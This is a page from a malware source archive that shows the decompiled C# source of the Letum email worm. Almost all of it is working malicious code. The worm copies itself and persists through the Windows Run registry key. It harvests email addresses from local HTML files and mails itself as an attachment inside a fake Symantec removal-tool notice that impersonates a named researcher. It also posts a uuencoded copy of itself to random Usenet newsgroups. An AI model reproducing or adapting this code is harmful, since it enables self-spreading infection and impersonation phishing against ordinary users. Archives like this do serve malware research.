mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-17 00:09:23 +00:00
vxunderground
260 lines
14 KiB
C#
260 lines
14 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: Letum22.Letum
|
|
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 824230F4-E564-4DC3-8691-5A3025A33873
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079.exe
|
|
|
|
using Microsoft.Win32;
|
|
using System;
|
|
using System.Collections;
|
|
using System.IO;
|
|
using System.Net.Sockets;
|
|
using System.Reflection;
|
|
using System.Text;
|
|
using System.Text.RegularExpressions;
|
|
using System.Threading;
|
|
using System.Windows.Forms;
|
|
|
|
namespace Letum22
|
|
{
|
|
public class Letum
|
|
{
|
|
private static Module self;
|
|
private static string pferrie = "peter_ferrie@symantec.com";
|
|
private static string[] nSubject = new string[7]
|
|
{
|
|
"Warning!",
|
|
"Virus Alert",
|
|
"Customer Support",
|
|
"Re:",
|
|
"Re:Warning",
|
|
nameof (Letum),
|
|
"Virus Report"
|
|
};
|
|
private static string[] nData = new string[3]
|
|
{
|
|
"Dear Users\r\n\r\nDue to the high increase of the Letum worm, we have upgraded it to Category B. Please use our attached removal tool to scan and disinfect your computer from the malware.\r\n\r\n Regards\r\n Security Response",
|
|
"Hiya,\r\n\r\n I've found this tool a couple of weeks ago, and after using it i was surprised on how good it was on squashing viruses. I wonder if avers know about this? ;)",
|
|
">>\r\n Maybe not but try this, i'm sure it will help you in your fight against malware. The engine it uses isnt to bad, but the searching speed is very fast for such a small size "
|
|
};
|
|
private static ArrayList List = new ArrayList();
|
|
|
|
[STAThread]
|
|
private static void Main()
|
|
{
|
|
Random random = new Random();
|
|
Thread thread1 = new Thread(new ThreadStart(Letum.nntp));
|
|
Thread thread2 = new Thread(new ThreadStart(Letum.smtp));
|
|
Letum.self = Assembly.GetExecutingAssembly().GetModules()[0];
|
|
Letum.CollectDirs("C:\\", Letum.List);
|
|
int index = random.Next(0, Letum.List.Count);
|
|
string str = Letum.List[index].ToString();
|
|
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey("Software\\Retro", true);
|
|
if (registryKey1 == null)
|
|
{
|
|
registryKey1 = Registry.CurrentUser.CreateSubKey("Software\\Retro");
|
|
registryKey1.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
|
|
File.Copy(Letum.self.FullyQualifiedName, str.ToString() + "\\" + Letum.self.ScopeName);
|
|
}
|
|
File.Delete(registryKey1.GetValue(nameof (Letum)).ToString());
|
|
File.Copy(Letum.self.FullyQualifiedName, str.ToString() + "\\" + Letum.self.ScopeName);
|
|
registryKey1.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
|
|
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
|
|
registryKey2.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
|
|
registryKey2.Close();
|
|
thread1.Start();
|
|
thread2.Start();
|
|
if (random.Next(0, 1983) != random.Next(0, 1983))
|
|
return;
|
|
int num = (int) MessageBox.Show("Dear Peter Ferrie \n\nGeNeTiX is a person not a f**king genetically modified food product. \nShe's not happy you called her that! \n\nRegards", "Name Entry Error", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
|
|
}
|
|
|
|
private static void nntp()
|
|
{
|
|
TcpClient tcpClient = new TcpClient();
|
|
ArrayList arrayList = new ArrayList();
|
|
StringBuilder stringBuilder = new StringBuilder();
|
|
Random random = new Random();
|
|
int startIndex1 = 0;
|
|
object obj1 = (object) null;
|
|
foreach (string subKeyName in Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\Accounts").GetSubKeyNames())
|
|
{
|
|
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\Accounts\\" + subKeyName);
|
|
foreach (string valueName in registryKey.GetValueNames())
|
|
{
|
|
if (valueName == "NNTP Server")
|
|
obj1 = registryKey.GetValue("NNTP Server");
|
|
}
|
|
}
|
|
if (obj1 == null)
|
|
;
|
|
try
|
|
{
|
|
tcpClient.Connect("news.microsoft.com", 119);
|
|
}
|
|
catch
|
|
{
|
|
return;
|
|
}
|
|
NetworkStream stream = tcpClient.GetStream();
|
|
StreamReader streamReader = new StreamReader((Stream) stream);
|
|
StreamWriter streamWriter = new StreamWriter((Stream) stream);
|
|
streamWriter.AutoFlush = true;
|
|
if (streamReader.ReadLine().Substring(0, 3) != "200")
|
|
{
|
|
streamWriter.WriteLine("LIST");
|
|
string text = streamReader.ReadLine();
|
|
int num = (int) MessageBox.Show(text);
|
|
while (text != ".")
|
|
{
|
|
text = streamReader.ReadLine();
|
|
if (text != ".")
|
|
{
|
|
text = text.Substring(0, text.IndexOf(" "));
|
|
arrayList.Add((object) text);
|
|
}
|
|
}
|
|
int index = random.Next(0, arrayList.Count);
|
|
object obj2 = arrayList[index];
|
|
streamWriter.WriteLine("GROUP " + obj2);
|
|
if (streamReader.ToString().Substring(0, 3) != "211")
|
|
{
|
|
streamWriter.WriteLine("POST");
|
|
if (streamReader.ToString().Substring(0, 3) != "340")
|
|
{
|
|
string str1 = Letum.nSubject[random.Next(0, Letum.nSubject.Length)];
|
|
string str2 = Letum.nData[random.Next(0, Letum.nData.Length)] + "\r\n\r\n";
|
|
FileStream fileStream = new FileStream(Letum.self.ScopeName, FileMode.Open, FileAccess.Read);
|
|
byte[] numArray = new byte[fileStream.Length];
|
|
fileStream.Read(numArray, 0, (int) fileStream.Length);
|
|
fileStream.Close();
|
|
string str3 = Encoding.ASCII.GetString(numArray);
|
|
string str4 = string.Empty;
|
|
if (str3.Length % 3 != 0)
|
|
{
|
|
string str5 = new string(' ', 3 - str3.Length % 3);
|
|
str3 += str5;
|
|
}
|
|
int length = str3.Length;
|
|
for (int startIndex2 = 1; startIndex2 <= length; startIndex2 += 3)
|
|
str4 = str4 + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 - 1, 1)) / 4 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 - 1, 1)) % 4 * 16 + (int) Convert.ToChar(str3.Substring(startIndex2, 1)) / 16 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2, 1)) % 16 * 4 + (int) Convert.ToChar(str3.Substring(startIndex2 + 1, 1)) / 64 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 + 1, 1)) % 64 + 32));
|
|
int count;
|
|
for (string str6 = str4.Replace(' ', '`'); startIndex1 < str6.Length; startIndex1 += count)
|
|
{
|
|
count = Math.Min(60, str6.Length - startIndex1);
|
|
stringBuilder.Append("M");
|
|
stringBuilder.Append(str6, startIndex1, count);
|
|
stringBuilder.Append("\r\n");
|
|
}
|
|
string str7 = stringBuilder.ToString();
|
|
string str8 = str7.Remove(str7.LastIndexOf("M"), 1);
|
|
string str9 = "FROM: " + Letum.pferrie + "\r\nNEWSGROUPS: " + obj2 + "\r\nSUBJECT: " + str1 + "\r\n\r\n" + (object) Letum.nData + "begin 644 " + Letum.self.ScopeName + "\r\n" + str8 + "\r\n'\r\nend\r\n.";
|
|
streamWriter.WriteLine(str9);
|
|
if (streamReader.ReadLine().Substring(0, 3) != "240")
|
|
tcpClient.Close();
|
|
}
|
|
}
|
|
}
|
|
tcpClient.Close();
|
|
}
|
|
|
|
private static void smtp()
|
|
{
|
|
TcpClient tcpClient = new TcpClient();
|
|
StringBuilder stringBuilder = new StringBuilder();
|
|
Random random = new Random();
|
|
object hostname = (object) null;
|
|
int startIndex = 0;
|
|
string str1 = "----=_NextPart_81_27_24";
|
|
string str2 = "<html><head></head><body bgcolor=\"white\" text=\"black\" link=\"blue\" vlink=\"purple\" alink=\"red\"><table border=\"0\" width=\"780\" bgcolor=\"white\"><tr><td width=\"154\" valign=\"top\" bgcolor=\"white\"><p> <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=\"154\"><p> <a href=\"http://www.symantec.com\"><img src=\"http://www.langtech.com/images/projects/symantec_logoESP.gif\" border=\"0\"></a></p><p> </td></tr><tr><td width=\"154\" background=\"http://security.symantec.com/sscv6/languageContent/ie/sym/images/us.navbar.background.gif\"><p> </p><p><font face=\"Verdana\" size=\"1\"><a href=\"http://www.symantec.com/legal/legal_note.html\">Legal Notices</a></font><font face=\"Verdana\" size=\"1\"> <br clear=\"all\"></font><font face=\"Verdana\" size=\"1\"><a href=\"http://www.symantec.com/legal/privacy.html\">Privacy Policy</a></font></p><p> </p><p> </p><p> </td></tr></table><p> </td><td width=\"618\" valign=\"top\" bgcolor=\"white\"><p align=\"left\"><font face=\"Verdana\" size=\"2\"><br></font></p><p align=\"left\"> </p><p align=\"left\"> <div align=\"center\"><table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"80%\"><tr><td width=\"616\"><p align=\"left\"> </p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Dear User,</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Due to the high increase of the Letum worm, we have upgraded it to Category B. Please use our attached removal tool to scan and disinfect your computer from the malware.</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">If you have any comments or questions about this, then please contact us.</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Regards</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Peter Ferrie<br clear=\"all\"></font><font face=\"Verdana\" size=\"1\">Senior Anti-Virus Researcher / Senior Principal Software Engineer </font></td></tr></table></div><p align=\"left\"></p><p align=\"left\"><div align=\"center\"><table border=\"0\" cellspacing=\"1\" width=\"100%\"><tr><td width=\"100%\" bgcolor=\"white\"><p align=\"center\"><font face=\"Verdana\" size=\"1\"><B>©1995 - 2006 Symantec Corporation All rights reserved.</font></td></B></tr></table></div></td></tr></table><p></p></body></html>";
|
|
foreach (string subKeyName in Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager").GetSubKeyNames())
|
|
{
|
|
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\" + subKeyName, true);
|
|
hostname = registryKey.GetValue("SMTP Server") != null ? registryKey.GetValue("SMTP Server") : (object) "mail.primaryhost.org.uk";
|
|
}
|
|
FileStream fileStream1 = new FileStream(Registry.CurrentUser.OpenSubKey("Software\\Retro", true).GetValue(nameof (Letum)).ToString(), FileMode.Open, FileAccess.Read);
|
|
byte[] numArray1 = new byte[fileStream1.Length];
|
|
fileStream1.Read(numArray1, 0, (int) fileStream1.Length);
|
|
fileStream1.Close();
|
|
int count;
|
|
for (string base64String = Convert.ToBase64String(numArray1); startIndex < base64String.Length; startIndex += count)
|
|
{
|
|
count = Math.Min(76, base64String.Length - startIndex);
|
|
stringBuilder.Append(base64String, startIndex, count);
|
|
stringBuilder.Append("\r\n");
|
|
}
|
|
tcpClient.Connect((string) hostname, 25);
|
|
NetworkStream stream = tcpClient.GetStream();
|
|
StreamReader streamReader = new StreamReader((Stream) tcpClient.GetStream());
|
|
StreamWriter streamWriter = new StreamWriter((Stream) stream);
|
|
streamWriter.AutoFlush = true;
|
|
if (streamReader.ToString().Substring(0, 3) != "220")
|
|
{
|
|
streamWriter.WriteLine("HELO localhost\r\n");
|
|
if (streamReader.ToString().Substring(0, 3) != "250")
|
|
{
|
|
try
|
|
{
|
|
foreach (string path in Letum.List)
|
|
{
|
|
foreach (string file in Directory.GetFiles(path, "*html"))
|
|
{
|
|
Regex regex = new Regex("[a-zA-Z0-9-_.-]+@[a-zA-Z0-9-_.-]+\\.[a-zA-Z0-9]+");
|
|
FileStream fileStream2 = new FileStream(file, FileMode.Open, FileAccess.Read);
|
|
byte[] numArray2 = new byte[fileStream2.Length];
|
|
fileStream2.Read(numArray2, 0, (int) fileStream2.Length);
|
|
fileStream2.Close();
|
|
foreach (Match match in regex.Matches(Encoding.ASCII.GetString(numArray2)))
|
|
{
|
|
streamWriter.WriteLine("MAIL FROM: " + Letum.pferrie);
|
|
if (streamReader.ToString().Substring(0, 3) != "250")
|
|
{
|
|
streamWriter.WriteLine("RCPT TO: " + (object) match);
|
|
if (streamReader.ToString().Substring(0, 3) != "250")
|
|
{
|
|
streamWriter.WriteLine("DATA");
|
|
if (streamReader.ToString().Substring(0, 3) != "354")
|
|
{
|
|
"FROM: Symantec Security Response <" + Letum.pferrie + ">\r\nTO: <" + (object) match + "> " + (object) match + "SUBJECT: " + Letum.nSubject[random.Next(0, Letum.nSubject.Length)] + "\r\nMIME-Version: 1.0\r\nContent-Type: multipart/mixed;\r\n\tboundary=\"" + str1 + "\"X-Priority: 3\r\nX-MSMail-Priority: Normal\r\nX-Mailer: Microsoft Outlook Express 6.00.2900.2180\r\nX-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180\r\n\r\nThis is a multi-part message in MIME format.\r\n--" + str1 + "\r\nContent-Type: text/html;\r\n\tcharset\"iso-8859-1\"\r\nContent-Transfer-Encoding: 7bit\r\n\r\n" + str2 + "\r\n--" + str1 + "\r\nContent-Type: application/octet-stream;\r\n\tname=\"test.exe\"\r\nContent-Transfer-Encoding: base64\r\nContent-Disposition: attachment;\r\n\tfilename=\"test.exe\"\r\n\r\n" + (object) stringBuilder + "\r\n\r\n--" + str1 + "--\r\n.\r\n";
|
|
if (!(streamReader.ToString().Substring(0, 3) != "250"))
|
|
{
|
|
int num1 = 0;
|
|
if (num1 < 5)
|
|
{
|
|
tcpClient.Close();
|
|
Letum.smtp();
|
|
int num2 = num1 + 1;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
catch (UnauthorizedAccessException ex)
|
|
{
|
|
}
|
|
}
|
|
}
|
|
tcpClient.Close();
|
|
}
|
|
|
|
private static void CollectDirs(string dir, ArrayList storage)
|
|
{
|
|
try
|
|
{
|
|
foreach (string directory in Directory.GetDirectories(dir))
|
|
{
|
|
storage.Add((object) directory);
|
|
Letum.CollectDirs(directory, storage);
|
|
}
|
|
}
|
|
catch (UnauthorizedAccessException ex)
|
|
{
|
|
}
|
|
}
|
|
}
|
|
}
|